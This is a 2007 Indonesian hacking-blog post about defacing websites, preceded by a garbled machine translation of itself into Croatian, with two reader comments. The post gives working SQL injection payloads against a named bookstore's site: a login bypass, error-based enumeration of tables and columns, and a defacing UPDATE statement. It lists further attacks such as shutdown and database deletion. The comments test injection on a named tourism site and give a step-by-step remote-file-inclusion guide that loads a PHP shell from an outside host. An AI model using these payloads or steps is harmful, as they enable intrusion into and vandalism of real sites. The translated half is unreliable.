Kako zbrisati SQL injekcije web stranica autralia uništiti

Indonesia

Zamrljati klirens umjetnosti. Arts zamrljati = Utvrditi je

haker u postojanje upoznati sami sebe, kako pronaći bugova
/ slabosti i kako ući u target sustava. Socijalne
enginering je glavno uporište i ti bi trebala biti za "novi
došljak 'haker. Zamrljati je glavni umjetnosti u kojem
svaka osoba ima u tom osobina, možemo procijeniti da je
razina ahlian haker u nejasnim. Hacker ima poseban pristup
ključem koji pokazuje prednosti oni permahaman sa
slijedećim:

1. Znate svoj cilj, cilj dijeliti moje osjećaje.

2. Provjerite jesu li naša srca, je u mogućnosti za
napraviti krađa "srcu" sa target protok podataka kanale sa
sposobnost društvenog enginering.
3. To je rekao: "dosta ceste prema Kini", ne mogu
perforiran web, pokušajte aja LOE kupiti drugi agresivan
poslužitelj sa cilj, moraju imati kapital coz emang no sada
besplatno školovanje Sad
4. Pitajte isti marljiva prvak google "biblijske
Hackers' www.google.com
5. Na vrhu planine, planina je još tamo, oni naučili
mnoge stvari iz beskrajnog smo semampu

Ja sam bio spreman, vrijeme je da isprobate, nakon samo TRY

praksi pseudonim (do antičkih ali uistinu dovoljno snažni
za istraživanje voće). Ova vježba u obuhvat VIROLOG.info,
pokušajte, ako je kadaluarso Oprosti.
Id.wikipedia.org
Hakiranje / Krekiranje: Besplatna knjiga Diface Što
pomoći ????( SQL Injection-bug u Gramedia) By. 4L13N

Posted by admin dana 2007/6/6 23:17:31 (1958 reads)

Previous Ispričavamo Ama www.id.wikipedia.org
NB: The Child Je li neiskusne slalu tako želim stvoriti
majstor udeh oke aja lewatin! Subota 2-June-2007 10 malem
zabavna sam surfati na lokacije www.id.wikipedia.org
namjeri sey liat-liat knjiga odjednom imaju đavla bisikin
"woi pokušajte dong neh site" tako pokušati platiti ga KAN?
Kliknem yes udeh stranicu truz član SQL_Injection probati
sa Username: admin Password: 'ili' = '
wah gileee može ići, ja nyangka site Gramedia razredu još
bug Ama bogate Gini, dalem hati GW ngomong "admin woii
Zašto? hehe33x može kupiti knjigu besplatno neyyy" kaga
'Ah, GW ga' MW tako kaznene, logout aja Ah! ! opet, proklet
vrag bisikin "Udeh zamrljati site !!!!" ehmm tuh gimana ya?
udeh izvanredno odgovornost! Što neki način, to lijepo?
Oiya, ažuriranje baze podataka aja ahh! vremena u potrazi
za informacijama, JA OpenBSD:
http://www.id.wikipedia.org/detil_newsevent.asp?id=06111010
2137

Što ću napraviti pogrešku tambahin citate jedan dielakang

obogatili Gini:
http://www.id.wikipedia.org/detil_newsevent.asp?id=06111010
2137 '

wahhh tamo, errornya! ahh ubrizgati Koje ime stol za

naredbu colomnya n 'Imajući 1 = 1 --
http://www.id.wikipedia.org/detil_newsevent.asp?id=06111010
2137 'Imajući 1 = 1 --
DEH kluar error:

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Stupac

'td_newsevent.NEWSEVENT_ID' nije ispravan odabir u listu
jer nije sadržana ni u jednoj skupnoj funkciju ili grupu
klauzulu.

wahh udaeh dapet naziv n kolum prvi stol "table name

td_newsevent n NEWSEVENT_ID ime kolum" terusin ahh!
Ja kolum pored mene na 'Group by kolum_name (NEWSEVENT_ID)
http://www.id.wikipedia.org/detil_newsevent.asp?id=06111010
2137 'grupu td_newsevent.NEWSEVENT_ID --
Error_Nya:

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Stupac

'td_newsevent.JUDUL' nije ispravan odabir u listu jer nije
sadržana ni u jednoj skupnoj funkciju ili grupu klauzulu.

Udeh dapet Ney kolum NASLOV petlje opet ahh!

http://www.id.wikipedia.org/detil_newsevent.asp?id=06111010
2137 'grupu td_newsevent.NEWSEVENT_ID, naslov --
Error_Nya:
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Stupac
'td_newsevent.PENULIS' nije ispravan odabir u listu jer
nije sadržana ni u jednoj skupnoj funkciju ili grupu
klauzulu.
Wahh AUTOR kolum ovo vrijeme petlje lagihttp: / /
www.id.wikipedia.org/detil_newsevent.asp?id=061110102137
'grupu td_newsevent.NEWSEVENT_ID, naslov, autor --
truz errornya: (ya sam udeh Cape ngetiknya ime glavnog
kolum-kolumnya iniJ)
NEWSEVENT_ID
NASLOV
AUTOR
SAŽETAK
OPIS
STATUSWawwww informacije udeh dovoljno neyyy ....
zamrljati, nejasnim, vrijeme je da se uvelo jedan
database_nya ovdje na 'Ažuriraj nama_tabel postaviti
nama_kolum =' Poruka '; --
Gini obogatili:

http://www.id.wikipedia.org/detil_newsevent.asp?id=06111010
2137 'update td_newsevent postaviti OPIS = "

< "Font color = crveno> <" nadstrešnica> 4L13N Bug NAĐENO

MOLIMO Patch Vaš sustav

'; --
Kok LW gak pake naredbu gdje sam? Opa ja sam lijen za to,
iako svima lagian OPIS colum u tablici td_newsevent
sudjelovati ter_Update sve Hehe33x!
Sada je hasilnye ....: Gramedia knjižara najpopularnijih
SE-Indonesia ukaza imate site koji se može precizirao jako
jako ugroženi od haker napada čak i neiskusan jarić tko ga
je bogata Što ja mogu !!!!>>- A samo da možemo laku'in od
TIDAAAAKKK! Što može biti više:
- Dodavanje sadržaja database_Nya .... Na 'Insert
- SQL Server ... smrt. Pake naredbu; shutdown
- Potražite korisničko ime admin password ... n za Uniju
odaberite pretvoriti ATO
- Član traže n korisničko ime lozinka
- Nejasnim što svibanj biti jedan stranicu Nge_Remote
- Mendelete baze podataka
- Mnogo više dahhhh Cape neyy malem dah

Kritik, Saran, bezobrazan dovraga n here_4l13n@yahoo.com

mail da ti javim hvale Gospoda ke_ SWT N Rosul2xnya

Topla pozdrav. 4L13N

Explore posts in jednak kategorije: Hakiranje-Krekiranje-

carding i pričekajte

Ovaj ulaz je pošta na November 1, 2007 at 8:08 pm i je

podnio pod Hakiranje-Krekiranje-carding i čekajte. Možete
se pretplatiti putem RSS 2.0 feed za ovaj post's comments.
Možete komentar ispod, ili link na ovu trajnog URL iz
vlastite web lokacije.
5 Komentari na "nagrditi: SQL Injection-Part 1"

1.
joe kaže:

Ožujak 4, 2008 at 8:56

mas ..
To može stvoriti testiranje?

http://www.gianyartourism.com/id.news.asp?lihat=detail&id=N
77668670

MrSinggih: Pokušajte ya mas ...

http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id
=A98435693 '

Microsoft JET Database Engine error'80040e14 '

Sintaktička pogreška u string izraza u upitu 'id_keg
=' A98435693 ".
/ Id.agenda.asp, line 51

http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id
=A98435693 'Having1 = 1 --

Microsoft JET Database Engine error'80040e14 '

Syntax error (missing operator) in query expression
'id_keg =' A98435693'Having1 = 1 - ".
/ Id.agenda.asp, line 51

http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id
=A98435693 'Grupiraj po id_keg'. A98435693 '--

Microsoft JET Database Engine error'80040e14 '

Sintaktička pogreška u string izraza u upitu
'id_keg'. A98435693' ".
/ Id.agenda.asp, line 51

... Ff. :-) :-) Kasnije sam prenošljivost no mas.

Pokušajte na svoj tečaj. Monggo
Odgovoriti
 2.
Singgih Kumoro kaže:

Ožujak 27, 2008 at 12:48

Tutorial Kako zamrljati udoban i tenan Enak ...

1. Http: / / www.milw0rm otvoren. com
2. kliknite Traži
3. Vrsta RFI (Remote File inclusion)
4. Traži iskorištavati ili CMS / Programi poznati
5. Idi na Google i liat Savjetničkog smo odabrali
6. * Ako je Dork [ključne riječi Google] Dork ga
koristiti, u
* Ako ne koristite više od iskorištavati
7. Nakon Googleove rezultate možete desnom tipkom
miša kliknite Otvori NewTab [Nah ovom
Srećom, njegova Pake Firefox, IE, ali može imati
najnoviju verziju Open NewTAB]
8. Otvori kontinuirano od List/Daftar2 pronađeno od
Googlea, dok ne
Osjećaj punog Browsernya
9. Isprobajte jedan po jedan iz rezultata s Command
iskorištavati
pronaći u savjetniku
10. Ako su poruke o pogreškama, traži da se poruka o
pogrešci
File inclusion neuspjeh, a ne File not found.
11. Ako vam File Not Found mogućnost; relativni put
from the Site, ili različite verzije, a možda
drugima.
12. Ako vam poruku o pogrešci datoteke inkluzije,
odnosno Blank White
bez poruka o pogrešci,
13. Promijeni iskoristiti naredba nakon '=' [ista] s
http://bugs.byethost32.com/php3.txt? [phpshell su OL
/ U]
14. Da biste vidjeli ekran, da li je stranica i
uspješno izvršavanje
Prikaži samo PHPShell r57shell ili prazne stranice,
i pojavljuje se
povratak File inclusion
15. Ako se stranice uspješno dovesti r57shell
[phpshell] nastaviti
Pretraživanje datoteka i Direktory da ima potpuni
pristup ili-rwxrwxrwx
/-RW-RW-RW <- za datoteke | drwxrwxrwx /-RW DRW-RW
<- za direktory
 16. Ako već imate neku datoteku ili direktory gore,
a vi
mogu učitati datoteke index.html u verziji koju je
napravio, ili za promjenu
index.php ili. HTML code s verzijom ste zaboravili
ime jgn dekodiranje
dikibarkan tamo ...
17. Nakon mijenjanja datoteke. Pokušajte vi vidite u
pregledniku, u skladu
relatife put s promjenom pred vama (Izvorni post by
ping_win)
Odgovoriti Cara deface web sql injection Indonesia hancurkan situs
autralia

Deface membutuh seni. Seni Deface=sebuah identify of hacker dalam memperkenalkan

eksistensi diri, bagaiman menemukan bug/kelemahan dan cara masuk ke system target.
Pengertian sosial enginering merupakan hal utama dan dasar yg harus dipelajari bagi
‘new comer’ hacker. Deface ialah seni utama dimana setiap orang memiliki ciri tersendiri
dalam melakukannya, kita dapat menilai tingkat ke ahlian sang hacker dalam deface.
Hacker memiliki kunci spesial akses yang menunjukan kelebihan mereka dengan
permahaman sbb:

1. Kenali target mu, tujuannya berbagi perasaan sayang.

2. Yakinkan hati kita, mampu kah mencuri “hati” target dengan saluran aliran data
dengan kemampuan sosial enginering.
3. Ada pepatah “banyak jalan menuju China” Tidak bisa tembus web, coba aja loe beli
hosting yg satu server dengan target, emang harus bermodal coz no education free now
Sad
4. Rajin bertanya sama mbah google “alkitab hacker’ www.google.com
5. Di atas gunung masih ada gunung, maka belajarlah banyak dari hal yang tak
terhingga, semampu kita

Kalo sudah siap, saatnya dicoba, berikut ini hanya sebatas TRY alias latihan (memang sih
cara kuno tapi cukup ampuh buah belajar). Latihan ini di ambil dari VIROLOG.info ,
silahkan dicoba, Maaf jika sudah kadaluarso.

Hacking/Cracking : Beli Buku Gratis Apa Diface Yach????(SQL-Injection bug in

gramedia) By. 4L13N

Posted by admin on 2007/6/6 23:17:31 (1958 reads)

Sebelumnya Gw minta maaf Ama www.id.wikipedia.org
NB: Gw Cuma Anak Ingusan Yang slalu ingin tau jadi buat yang udeh master lewatin aja
oke!!!!Sabtu 2-juni-2007 jam 10 malem Iseng-iseng gw surfing ke situs
www.id.wikipedia.org niatnya sey liat-liat buku tiba-tiba ada setan yang bisikin “woi
coba dong neh situs” iya coba-coba ga bayar kan???? ya udeh gw klik halaman member
truz gw coba pake SQL_Injection dengan username: admin Password: ‘or ”=’
wah gileee bisa masuk, gak nyangka situs sekelas gramedia masih kena ama bug’s kaya
gini, dalem hati gw ngomong “woii admin Why???hehe33x bisa beli buku gratis neyyy”
kaga’ ah, gw ga’ mw jadi kriminal, logout aja ah!!! lagi-lagi, setan keparat bisikin “Udeh
deface tuh situs!!!!” ehmm gimana ya?? udeh kepalang tanggung!! pake cara apa ya,
yang enak???Oiya, Update database server aja ahh!!! saatnya mencari informasi, gw
buka:
http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137

buat nyari error gw tambahin tanda kutip satu dielakang jadinya kaya gini:
http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137‘

wahhh ada, errornya!!! inject ahh buat nyari nama tabel n colomnya pake perintah
‘Having 1=1–
http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137‘Having 1=1–
kluar error deh :

[Microsoft][ODBC SQL Server Driver][SQL Server]Column

‘td_newsevent.NEWSEVENT_ID’ is invalid in the select list because it is not contained
in either an aggregate function or the GROUP BY clause.

wahh udaeh dapet nama tabel n kolum pertamanya “td_newsevent nama tabel n
NEWSEVENT_ID nama kolum” terusin ahh!!!
untuk tau kolum berikutnya gw pake perintah
‘Group+by+kolum_name(NEWSEVENT_ID)
http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137%20‘group%20by%
20td_newsevent.NEWSEVENT_ID–
Error_Nya :

[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘td_newsevent.JUDUL’ is

invalid in the select list because it is not contained in either an aggregate function or the
GROUP BY clause.

Udeh dapet ney kolum JUDUL looping lagi ahh!!!

http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137%20‘group%20by%
20td_newsevent.NEWSEVENT_ID,JUDUL–
Error_Nya :
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘td_newsevent.PENULIS’
is invalid in the select list because it is not contained in either an aggregate function or
the GROUP BY clause.
Wahh kali ini kolum PENULIS gw looping
lagihttp://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137%20‘group%20b
y%20td_newsevent.NEWSEVENT_ID,JUDUL,PENULIS–
truz errornya: (udeh ya gw cape ngetiknya pokoknya nama kolum-kolumnya iniJ )
NEWSEVENT_ID
JUDUL
PENULIS
SUMMARY
DESCRIPTION
STATUSWawwww Informasinya udeh cukup neyyy…. deface-deface, tiba saatnya untuk
menginjeksi database_nya disini gw pake perintah
‘Update+nama_tabel+set+nama_kolum=’pesan’;–
jadinya kaya gini:

http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137%20‘update+td_new
sevent+set+DESCRIPTION=”

<”font%20color=red><”marquee>4L13N%20FOUND%20BUG%20PLEASE%20PATC
H%20YOUR%20SYSTEM

‘;–
Kok lw gak pake perintah where sich??? Wah Gw terlalu malas untuk itu, lagian biar
semua colum DESCRIPTION yang ada di tabel td_newsevent ikut ter_Update semuanya
Hehe33x!!
Nah ini dia hasilnye….:Gramedia toko buku paling populer se-Indonesia ternyata
mempunyai situs yang bisa dibilang amat sangat rentan dari serangan hacker bahkan
bocah ingusan yang ga’ tau apa-apa kaya gw juga bisa!!!!>>-A Apa cuma itu yang bisa
kita laku’in tentu TIDAAAAKKK!!!! kalo ditelusuri lagi kita bisa :
- Menambahkan isi database_Nya….pake perintah ‘Insert
- mematikan Sql server….pake perintah ;shutdown
- mencari username admin n passwordnya… pake perintah union+select ato convert
- mencari username member n passwordnya
- deface satu halaman ato mungkin Nge_Remote
- mendelete database
- masih banyak lagi dahhhh cape neyy dah malem

Kritik,Saran,Cacian n Makian mail To here_4l13n@yahoo.com kalo pujian kirim ke_

ALLAH SWT N Rosul2xnya

Salam Hangat By. 4L13N

Explore posts in the same categories: Hacking-Cracking-Carding dan Sejenisnya

This entry was posted on Nopember 1, 2007 at 8:08 am and is filed under Hacking-
Cracking-Carding dan Sejenisnya. You can subscribe via RSS 2.0 feed to this post's
comments. You can comment below, or link to this permanent URL from your own site.
5 Comments on “Deface: SQL Injection Part-1”

1.
joe Says:

Maret 4, 2008 at 8:56 am

 mas..
ini bisa buat testing gak?
http://www.gianyartourism.com/id.news.asp?lihat=detail&id=N77668670

MrSinggih : Coba ya mas …

http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id=A98435693‘

Microsoft JET Database Engine error ‘80040e14′

Syntax error in string in query expression ‘id_keg=’A98435693”’.
/id.agenda.asp, line 51

http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id=A98435693‘Having1
=1-

Microsoft JET Database Engine error ‘80040e14′

Syntax error (missing operator) in query expression
‘id_keg=’A98435693′Having1=1-”.
/id.agenda.asp, line 51

http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id=A98435693‘Group%
20by%20id_keg.’A98435693′-

Microsoft JET Database Engine error ‘80040e14′

Syntax error in string in query expression ‘id_keg.’A98435693′-”.
/id.agenda.asp, line 51

Dst…. :-) :-) Nanti saya ndak keterusan mas. Di coba sendiri saja. Monggo
Balas
2.
Singgih Kumoro Says:

Maret 27, 2008 at 12:48 am

Tutorial Cara deface yang Nyaman dan Enak Tenan …

1. Buka http://www.milw0rm. com
2. klik Search
3. ketik RFI (Remote File Inclusion)
4. Cari Exploit terbaru atau CMS/Aplikasi yang terkenal
5. Buka Google, dan liat Advisor yang kita pilih tersebut
6. * Jika terdapat DORK[kata kunci google] gunakan lah Dork tersebut,
* Jika tidak gunakanlah Judul dari Exploit tersebut
7. Setelah dapat hasil dari Google, klik kanan Open NewTab [Nah ini
untung nya Pake Firefox, tapi IE versi terbaru sudah bisa Open NewTAB]
8. Buka terus dari List/Daftar2 yang terdapat dari google, hingga kamu
rasa penuh Browsernya
9. Coba satu persatu dari hasil tersebut dengan Exploit Command yang
terdapat di advisor
10. Jika terjadi pesan error, cari Pesan error yang menyatakan
kegagalan File Inclusion, bukan File Not Found.
11. Jika menemukan File Not Found kemungkinan; salah Relative Path
dari Site tersebut, atau memang beda versi, dan kemungkinan lain.
12. Jika menemukan pesan error dari File Inclusion, atau Blank Putih
tanpa Pesan Error,
13. Ganti command exploit setelah tanda ‘=’[sama dengan] dengan
http://bugs.byethost32.com/php3.txt? [phpshell yang OL/Aktif]
14. Lihat ke Layar, apakah site tersebut berhasil mengeksekusi dan
menampilkan PHPShell r57shell atau hanya Blank Page, dan muncul
kembali File Inclusion
15. Jika site berhasil memunculkan r57shell [phpshell] lanjutkan ke
pencarian File dan Direktory yang memiliki full akses atau -rwxrwxrwx
/ -rw-rw-rw <– untuk file | drwxrwxrwx / drw-rw-rw <– untuk direktory
16. Jika telah mendapatkan file atau direktory diatas tersebut, kamu
bisa mengupload file index.html versi buatan kamu, atau mengubah
index.php or .html dengan versi code kamu jgn lupa nama decoding
dikibarkan disana…
17. Setelah merubah file tersebut. Coba kamu lihat di browser sesuai
dengan relatife path yang kamu ubah tadi (Original post by ping_win)
Balas